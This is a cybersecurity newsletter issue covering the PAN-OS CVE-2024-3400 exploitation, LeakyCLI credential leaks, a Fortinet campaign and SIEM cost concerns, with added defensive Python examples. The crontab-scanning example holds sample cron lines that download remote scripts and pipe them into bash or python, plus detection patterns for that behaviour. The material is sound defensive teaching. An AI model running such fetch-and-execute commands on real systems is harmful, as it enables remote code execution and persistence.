Good Morning and Happy Friday - Your weekly sip of the latest in cybersecurity from the Cybersec Cafe: Palo Alto Networks Under Attack. Risk in the Cloud. Data Ingestion costs are getting out of control.
Critical Flaw in Palo Alto Networks PAN-OS Under Attack
Palo Alto Networks has issued a stark warning regarding a critical vulnerability, CVE-2024-3400, affecting its PAN-OS software used in GlobalProtect gateways. With a CVSS score of 10.0, the flaw allows unauthenticated attackers to execute arbitrary code with root privileges on impacted firewalls. This vulnerability affects specific PAN-OS versions and configurations, emphasizing the urgency of applying the fixes slated for release April 14. While Palo Alto Networks is actively addressing the issue, organizations are advised to enable Threat ID 95187 as a temporary measure to bolster security against potential exploits. This alert underscores the escalating threat landscape, exemplified by recent zero-day exploits leveraged by threat actors for covert network access and persistence.
Threat actors have exploited the disclosed zero-day flaw for nearly three weeks before its public disclosure. This command injection vulnerability enables attackers to execute arbitrary code with root privileges on affected firewalls. Dubbed Operation MidnightEclipse, the activity involves the creation of a cron job fetching commands from an external server to launch a Python-based backdoor, facilitating unauthorized access and data exfiltration. With the flaw affecting PAN-OS 10.2, 11.0, and 11.1 configurations, organizations are urged to apply forthcoming patches promptly to mitigate risks and safeguard network integrity against sophisticated threat actors.
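The persistence described above relies on a scheduled job that pulls commands from an external host. As an added example (not from the page or from Palo Alto Networks' own tooling), the following Python check scans crontab-style text for entries that fetch a remote URL with curl or wget and hand the result to a shell or script interpreter, which is the pattern a defender would want to surface during triage. The sample crontab content, hostnames and IP addresses are constructed for the demo.

```python
import re
from dataclasses import dataclass

# Constructed sample crontab content (not taken from the page or from any real incident).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/15 * * * * /usr/local/bin/backup.sh
* * * * * /usr/bin/wget -qO- http://203.0.113.10/update.txt | /usr/bin/bash
*/5 * * * * curl -s https://198.51.100.7/task | python3 -
30 2 * * 0 curl -sS https://mirror.example.com/packages.list -o /var/tmp/packages.list
"""

CRON_LINE = re.compile(r"^(\S+\s+\S+\s+\S+\s+\S+\s+\S+)\s+(.+)$")
URL = re.compile(r"https?://[^\s'\"|;]+")
FETCH_TOOL = re.compile(r"\b(curl|wget)\b")
INTERPRETER = re.compile(r"\b(sh|bash|dash|zsh|python[0-9.]*|perl)\b")


@dataclass
class Finding:
    schedule: str
    command: str
    url: str
    reason: str


def flag_suspicious_cron(text):
    """Return one Finding per entry that downloads from a URL with curl/wget.
    Entries that pipe the download into an interpreter get the strongest
    reason; a plain download to disk is still reported, at lower severity."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = CRON_LINE.match(line)
        if not m:
            continue  # environment settings such as MAILTO=, or malformed entries
        schedule, command = m.groups()
        url_match = URL.search(command)
        if not url_match or not FETCH_TOOL.search(command):
            continue
        after_pipe = command.split("|", 1)[1] if "|" in command else ""
        if INTERPRETER.search(after_pipe):
            reason = "remote content piped into an interpreter"
        else:
            reason = "scheduled remote download"
        findings.append(Finding(schedule, command, url_match.group(0), reason))
    return findings


if __name__ == "__main__":
    for f in flag_suspicious_cron(SAMPLE_CRONTAB):
        print(f"[{f.reason}] {f.schedule} -> {f.url}")
```

Run it against `crontab -l` output for each account, the files under /etc/cron.d, and any periodic-job listing the appliance exposes; an every-minute schedule combined with the "piped into an interpreter" reason deserves immediate attention.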
Did You Know?
Passkeys - Is this what the internet needs?
The FIDO Alliance points out that passwords are the root of 80% of data breaches. Everyone has heard the advice that every online account must have a strong, unique password, which in practice requires a password manager. But this perceived friction keeps a lot of users from taking even that basic step to secure their accounts. With social engineering and phishing attacks continuing to be a risk, and with credentials easily harvestable from data breach records, the internet needs better security, which is exactly what passkeys promise.
Hybrid Cloud is the Way
With the rise of cloud-based services, cloud computing vulnerabilities have become a prominent concern in cybersecurity. Approximately 45% of data breaches occur in the cloud. However, organizations that adopt a hybrid cloud model, combining public and private clouds, see lower average breach costs ($3.80 million) than those relying solely on public ($5.02 million) or private ($4.24 million) clouds.
PII
Personally identifiable information (PII) encompasses sensitive data like names, email addresses, and Social Security numbers. Hackers often exploit this information for identity theft, since it can often be found using open-source intelligence (OSINT). Protect your identity by refraining from sharing PII, especially on social media, and consider removing any personal information from online platforms to minimize the risk of identity theft. And, as always, beware of phishing or vishing attacks.
Securing Cloud Environments: Beware of CLI Vulnerabilities
Recent research highlights a critical weakness in command-line interface (CLI) tools from major cloud providers like Amazon Web Services (AWS) and Google Cloud, termed LeakyCLI by security firm Orca. These tools, including commands such as aws lambda get-function-configuration and gcloud functions deploy, print environment variables in their output, so any credentials stored there can end up in build logs, posing significant risks to organizations. While Microsoft has addressed the issue with CVE-2023-36052, both Amazon and Google consider this behavior expected, emphasizing the need for organizations to avoid storing secrets in environment variables and instead use dedicated secrets management services like AWS Secrets Manager or Google Cloud Secret Manager.
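Because the vendors treat the behavior as expected, the practical defenses are to keep secrets out of environment variables and to scrub CLI output before it reaches a build log. The Python below is an added example (not from the page or from Orca's, AWS's or Google's own tooling): it redacts the Environment.Variables block of a get-function-configuration style JSON response, lists the variable names that look like credentials so they can be moved to a secrets manager, and masks NAME=value pairs in plain-text log lines. The field names follow the real Lambda response shape; the function name and all values are constructed.

```python
import json
import re
from copy import deepcopy

# Constructed sample resembling `aws lambda get-function-configuration` output.
# Field names follow the real response shape; every value here is made up.
SAMPLE_CONFIG = {
    "FunctionName": "orders-api",
    "Runtime": "python3.12",
    "Environment": {
        "Variables": {
            "DB_HOST": "orders-db.internal",
            "DB_PASSWORD": "example-not-a-real-password",
            "THIRD_PARTY_API_KEY": "sk_test_0000EXAMPLE",
            "LOG_LEVEL": "info",
        }
    },
}
SAMPLE_OUTPUT = json.dumps(SAMPLE_CONFIG)

# Variable names that usually hold credentials and belong in a secrets manager.
SENSITIVE_NAME = re.compile(r"(PASS(WORD)?|SECRET|TOKEN|API_?KEY|PRIVATE_?KEY|CREDENTIAL)", re.I)
KV = re.compile(r"\b([A-Z][A-Z0-9_]*)=(\S+)")
REDACTED = "[REDACTED]"


def env_vars(config):
    return (config.get("Environment") or {}).get("Variables") or {}


def secret_like_env_names(config):
    """Names of env vars that look like credentials, sorted for stable output."""
    return sorted(name for name in env_vars(config) if SENSITIVE_NAME.search(name))


def redact_environment(config):
    """Copy of the config with every env var value replaced. All values are
    masked, not just the suspicious ones, because a build log has no need for
    any of them and name-based heuristics miss oddly named secrets."""
    out = deepcopy(config)
    if env_vars(out):
        out["Environment"]["Variables"] = {k: REDACTED for k in out["Environment"]["Variables"]}
    return out


def scrub_cli_output(raw_json):
    """Parse CLI JSON output; return (safe text to log, names to migrate)."""
    config = json.loads(raw_json)
    return json.dumps(redact_environment(config), indent=2), secret_like_env_names(config)


def scrub_log_line(line):
    """Mask NAME=value pairs with credential-like names in plain-text log lines."""
    return KV.sub(
        lambda m: f"{m.group(1)}={REDACTED}" if SENSITIVE_NAME.search(m.group(1)) else m.group(0),
        line,
    )


if __name__ == "__main__":
    safe_text, to_migrate = scrub_cli_output(SAMPLE_OUTPUT)
    print(safe_text)
    print("move to a secrets manager:", to_migrate)
    print(scrub_log_line("Deploying with DB_PASSWORD=hunter2 LOG_LEVEL=info"))
```

In a CI pipeline, pipe the CLI's stdout through scrub_cli_output before anything writes it to the job log, and run scrub_log_line over free-form deploy output; treat a non-empty "move to a secrets manager" list as a finding in its own right, since the redaction only hides the symptom.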
This week at the Cybersec Cafe…
SSRF with Filter Bypass via Open Redirection
Learn the step-by-step methodology behind leveraging an Open Redirect to exploit SSRF with a Filter Bypass, then give it a try yourself!
Full article here.
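The bypass in this week's walkthrough works because a server-side fetcher validates only the first URL and then lets the HTTP client follow a redirect to a destination that would never have passed the check. The mitigation is to validate every hop. The following Python fetcher is an added example (not code from the article or from the Cybersec Cafe): it refuses automatic redirects, re-checks the allowlist and the resolved address at each hop, and uses an offline stand-in transport and resolver so the demo runs without a network. The hostnames, IP addresses and responses are constructed.

```python
import ipaddress
import socket
import urllib.error
import urllib.request
from urllib.parse import urljoin, urlparse

MAX_HOPS = 3
REDIRECT_CODES = {301, 302, 303, 307, 308}


def is_safe_target(url, allowed_hosts, resolve=socket.gethostbyname):
    """Return (ok, reason). The hostname must be on the allowlist AND must resolve
    to a globally routable address; both checks are repeated for every hop."""
    parts = urlparse(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed"
    host = parts.hostname
    if host is None or host not in allowed_hosts:
        return False, "host not on allowlist"
    try:
        ip = ipaddress.ip_address(resolve(host))
    except (socket.gaierror, ValueError):
        return False, "hostname does not resolve"
    if not ip.is_global:  # covers loopback, RFC 1918, link-local, reserved ranges
        return False, "does not resolve to a public address"
    return True, "ok"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    # Returning None makes urllib raise HTTPError for 3xx instead of following it.
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_send(url):
    """Real transport: one request, no redirect following -> (status, headers, body)."""
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(url, timeout=5) as resp:
            return resp.status, dict(resp.headers), resp.read()
    except urllib.error.HTTPError as err:
        return err.code, dict(err.headers), b""


def fetch_checking_each_hop(url, allowed_hosts, send=http_send, resolve=socket.gethostbyname):
    """Fetch url, validating the original URL and every redirect target alike."""
    for _ in range(MAX_HOPS + 1):
        ok, reason = is_safe_target(url, allowed_hosts, resolve)
        if not ok:
            raise ValueError(f"blocked {url}: {reason}")
        status, headers, body = send(url)
        location = next((v for k, v in headers.items() if k.lower() == "location"), None)
        if status in REDIRECT_CODES and location:
            url = urljoin(url, location)  # re-validated on the next iteration
            continue
        return body
    raise ValueError("too many redirects")


# Constructed offline demo: a fake resolver and transport stand in for the network.
_FAKE_DNS = {"images.example.com": "23.45.67.89", "cdn.example.com": "10.0.0.8"}
_FAKE_RESPONSES = {
    "https://images.example.com/logo.png": (200, {}, b"PNG-bytes"),
    # an open redirect on the allowlisted host pointing at loopback
    "https://images.example.com/redir?to=http://127.0.0.1/admin":
        (302, {"Location": "http://127.0.0.1/admin"}, b""),
}


def _fake_resolve(host):
    try:
        return _FAKE_DNS[host]
    except KeyError:
        raise socket.gaierror(host)


def _fake_send(url):
    return _FAKE_RESPONSES[url]


def run_demo():
    allowed = {"images.example.com", "cdn.example.com"}
    results = {"direct": fetch_checking_each_hop(
        "https://images.example.com/logo.png", allowed, _fake_send, _fake_resolve)}
    for name, url in [("redirect_to_loopback", "https://images.example.com/redir?to=http://127.0.0.1/admin"),
                      ("private_ip", "https://cdn.example.com/x")]:
        try:
            fetch_checking_each_hop(url, allowed, _fake_send, _fake_resolve)
            results[name] = "allowed"
        except ValueError as err:
            results[name] = str(err)
    return results


if __name__ == "__main__":
    for name, outcome in run_demo().items():
        print(f"{name}: {outcome}")
```

Two design points matter: the redirect handler is disabled so the fetcher, not the HTTP library, decides whether to follow each Location header, and the address check runs on the resolved IP rather than the hostname so an allowlisted name pointing at an internal range is also refused.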
AI Headache
The rise of Generative AI (GenAI) tools like ChatGPT has ushered in a new era of productivity in the software industry, but with it comes a wave of security concerns. While GenAI promises enhanced efficiency and creativity, its use in the workplace raises alarms about data security and privacy. Organizations face challenges in controlling GenAI adoption and mitigating associated risks, prompting reactive bans from some sectors and heightened scrutiny from governments. With the evolving landscape of hybrid work models and blurred lines between personal and professional technology usage, it's crucial for businesses to implement robust governance frameworks and security measures to safeguard against emerging threats and regain control over their SaaS ecosystem.
Worth the Read
While some of my readers may see these tips as “obvious,” this article serves as a nice reminder of just how to be more conscious of our digital footprint, highlighting some great tips to ensure your digital data isn’t being overly shared. A little refresher never hurt nobody!
OSINT is an important part of cybersecurity, whether you’re playing offense or defense. Knowing the tools available to you can make your OSINT processes more efficient and also allow you to find more information. This blog post details the different tools you can integrate into your processes.
Exploitation Campaign Targets Fortinet Flaw
Cybersecurity researchers have uncovered a new campaign exploiting a critical security vulnerability, CVE-2023-48788, in Fortinet FortiClient EMS devices to deliver ScreenConnect and Metasploit Powerfun payloads. Tracked as Connect:fun by Forescout, the intrusion targeted a media company shortly after the release of a proof-of-concept exploit on March 21, 2024, highlighting the urgency of patching vulnerable systems. The threat actor, displaying manual intervention, attempted to download and install tools, signaling a targeted campaign rather than automated cybercriminal activity.
Your Thoughts?
Data Ingestion Cost
For those familiar with working in a Security Operations Center (SOC), you know how critically our operations rely on data. For those unacquainted, the crux of the Security Operations Center lies in the ingestion of data into the Security Information and Event Management (SIEM) system. This tool takes in logs from various systems, drives security alerting, and manages events for any system it ingests and sets up detections for. While there are a lot of use cases in cybersecurity that are built on log ingestion, the SIEM stands as an indispensable element in ensuring organizational security.
An alarming case surfaced in 2023 where a customer was slapped with a staggering $65 million bill for their data ingestion expenses into their SIEM. The costs associated with data ingestion have spiraled to an insane level for organizations.
Furthermore, opting for a particular SIEM provider often results in vendor lock-in due to the substantial investment, both financially and man-hours, required to transition to an alternative solution.
In light of this issue, we're witnessing the emergence of SIEM solutions that can be constructed on top of a data lake, offering SOC teams the flexibility to move their data seamlessly across different tools. However, at the moment, few products have come to market that fully support a range of data lake backends.
But, is this the way of the future?
Navigating the Risks of AI in Software Development
As artificial intelligence (AI) continues to take shape in our world, the security implications of its integration into software development cannot be ignored. From GitHub Copilot's code suggestions to broader AI-generated vulnerabilities, the potential risks demand more than a stern glance. While AI holds much promise for innovation, its rapid advancement has outpaced security measures, leaving systems vulnerable to prompt injection and other sophisticated attacks. While security concerns generally lag behind the development of all software, we should tread these waters more carefully.
Securely Yours,
The Cybersec Cafe
Just a heads up, The Cybersec Cafe's got a pretty cool weekly cadence.
Every week, expect to dive into the hacker’s mindset in our Methodology Walkthroughs or explore Deep Dive articles on various cybersecurity topics.
. . .
Oh, and if you want even more content and updates, hop over to Ryan G. Cox on Twitter/X or my Website. Can't wait to keep sharing and learning together!